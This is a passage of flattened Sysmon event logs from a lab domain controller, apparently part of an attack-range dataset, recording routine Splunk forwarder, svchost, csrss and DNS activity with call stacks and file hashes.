14:07:18.111{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203063Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.111{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E996-6040-3E4E-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203062Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.111{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E996-6040-3E4E-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203061Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:18.112{5ABCFE62-E996-6040-3E4E-00000000AD01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203090Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.752{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B8E51084C28F66832F9EA4C89EA56CD,SHA256=A83180CD2F272DACD68F26893EA0B75894DAAED02FC0229490C6FB4DC9DD4E3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203089Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.736{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E6C3F3C65DF0D5A2C7D41C6D2590C1E,SHA256=21636CA5255DF451EDF5FC0BCF7280A87DC880CF32C2FA4AE5F65B66D0C13B9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203088Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.533{5ABCFE62-E997-6040-404E-00000000AD01}50286736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203087Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.408{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E997-6040-404E-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203086Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203085Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203084Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203083Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203082Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.408{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E997-6040-404E-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203081Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.408{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E997-6040-404E-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203080Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.409{5ABCFE62-E997-6040-404E-00000000AD01}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203091Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:20.736{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56576C0F579C0B3BC038A27B073A1B25,SHA256=6A13AAAE4A99D81AFDA1D2898F2552F5803B33D2646120168A8BF623AADF2F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203093Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:21.752{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA9DCC1462EE7439DEF9EC5673B51ABB,SHA256=12F5EA320982F6BD34D3A7F0FEB596C536559C5C3BBBA765869E263514D82BAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203092Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:21.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78F18818EFD2F0E74F551C115E361F1D,SHA256=8EDFE64957C8F88065D98EE64BF93810C38AAFAB4F197FC234CEAA039AAAEEE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203097Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:22.986{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BC4522607CEA5A2654FBAE9260D4E51,SHA256=0442620CE09AC05CA31562C0D5B5C6C7E9347BF1C1E8ECA48E6A859C3A5D7422,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203096Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:22.767{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F1D39FD5D9F3E3932B6242F1516E843,SHA256=06D56153757889C9C9DA6211C97652C3054B2C186143F39E7EE2BF332C1D28CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203095Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:17.994{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60694-false10.0.1.12-8000- 23542300x80000000000000002203094Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:22.236{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7491CB48756FB88FCAB23ABEC5BD12DC,SHA256=A9F8A9EBB5BBE6FC24A4A02336DEF247BFB79BB324EBE5EB8919198BE07AF6FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203099Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:23.783{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=324D18BE0DD67EBCA40AA24D51C58D89,SHA256=C5FBB94B396A79CF5583A9643760C27775A79AA0A2B82FDCD0152B16C5684B4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203098Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:19.792{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51476-true2001:500:2f:0:0:0:0:ff.root-servers.net53domain 23542300x80000000000000002203100Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:24.784{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0A4D726CCD4CFA1A59E8A9181185C6,SHA256=84C83C82EAAF30C1E6611E2C2402A827AA324459CAFC28C406EAB3DA12ADCBA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203133Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203132Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203131Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203130Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203129Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203128Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203127Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203126Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203125Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203124Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203123Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 